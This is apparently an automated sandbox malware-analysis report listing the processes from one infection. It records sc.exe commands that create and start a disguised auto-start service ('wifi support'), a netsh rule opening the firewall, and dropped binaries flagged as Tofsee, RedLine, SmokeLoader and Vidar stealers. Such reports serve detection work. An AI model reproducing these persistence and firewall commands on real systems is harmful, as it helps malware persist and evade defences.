                                                                                                                                                                                                        Start time:19:33:09
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sc.exe PID: 2856 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:10
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                                        Imagebase:0x1170000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 3952 Parent PID: 2856

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:10
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sc.exe PID: 4784 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:11
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                                                                                                                                                                                                        Imagebase:0x1170000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 4696 Parent PID: 4784

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:11
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sc.exe PID: 6404 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:12
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" start dbgxuqbr
                                                                                                                                                                                                        Imagebase:0x1170000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6972 Parent PID: 6404

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:13
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: netsh.exe PID: 7000 Parent PID: 4992

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:13
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        Imagebase:0x11f0000
                                                                                                                                                                                                        File size:82944 bytes
                                                                                                                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sdiimdop.exe PID: 4560 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:15
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:14973440 bytes
                                                                                                                                                                                                        MD5 hash:F548B3529CA470C25E50AF6220AD3098
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 2076 Parent PID: 7000

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:15
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: CBA.exe PID: 7052 Parent PID: 5652

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:15
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Imagebase:0xf90000
                                                                                                                                                                                                        File size:539136 bytes
                                                                                                                                                                                                        MD5 hash:6C72997AA5DD44A44B27BD36347BAED9
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 5180 Parent PID: 4560

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:17
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:svchost.exe
                                                                                                                                                                                                        Imagebase:0x930000
                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 7064 Parent PID: 556

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:22
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: MpCmdRun.exe PID: 4176 Parent PID: 6888

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:27
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                        Imagebase:0x7ff66d780000
                                                                                                                                                                                                        File size:455656 bytes
                                                                                                                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 4140 Parent PID: 4176

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:27
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: scifbcd PID: 6852 Parent PID: 904

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:27
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\scifbcd
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:358912 bytes
                                                                                                                                                                                                        MD5 hash:1F935BFFF0F8128972BC69625E5B2A6C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: 2757.exe PID: 2904 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:31
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        Imagebase:0x1150000
                                                                                                                                                                                                        File size:1497920 bytes
                                                                                                                                                                                                        MD5 hash:67B848B139E584BF3361A51160FC6731
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, Author: Joe Security

                                                                                                                                                                                                        Analysis Process: 4187.exe PID: 6064 Parent PID: 3472

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:19:33:37
                                                                                                                                                                                                        Start date:04/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\4187.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\4187.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:760832 bytes
                                                                                                                                                                                                        MD5 hash:C085684DB882063C21F18D251679B0CC
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                        Reset < >